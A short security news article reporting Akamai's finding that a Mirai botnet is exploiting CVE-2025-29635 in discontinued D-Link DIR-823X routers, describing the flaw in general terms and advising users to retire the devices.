Akamai has revealed that a Mirai botnet is actively exploiting a security flaw in discontinued D-Link routers. This vulnerability, identified as CVE-2025-29635, was first disclosed a year ago and remains a significant threat to users who have not retired these devices.
Understanding the Vulnerability
The vulnerability arises from a failure to validate an attacker-controlled function value, which can be manipulated through specially crafted POST requests. Akamai explains that the router processes data from the request body without verifying its source, allowing attackers to manipulate the command buffer.
This flaw is similar to a proof-of-concept exploit published on GitHub last year, which has since been removed. The attack involves loading a shell script to download and execute a payload with Mirai characteristics, such as XOR encoding and hardcoded execution strings.
Impact on D-Link Routers
The affected devices are part of the D-Link DIR-823X series, specifically firmware versions 240126 and 24082. These routers, having been discontinued last year, no longer receive software updates from D-Link, increasing the risk for users who continue to operate them.
In September, D-Link issued a warning advising users to retire these products to avoid potential security risks to connected devices. Despite this, exploitation attempts targeting these routers persist.
Wider Implications and Future Threats
Akamai notes that the attackers have also targeted vulnerabilities in TP-Link and ZTE routers, highlighting a broader threat across different brands. The ongoing Mirai malware campaigns leverage the original source code, which is easily accessible and often reused by both experienced and novice threat actors.
The low entry barrier and potential financial rewards continue to drive individuals towards engaging in botnet activities, posing ongoing challenges to cybersecurity efforts. Users are urged to upgrade to secure devices and remain vigilant against evolving threats.
As cyber threats continue to evolve, it is crucial for individuals and organizations to prioritize network security and take proactive measures to safeguard their systems.
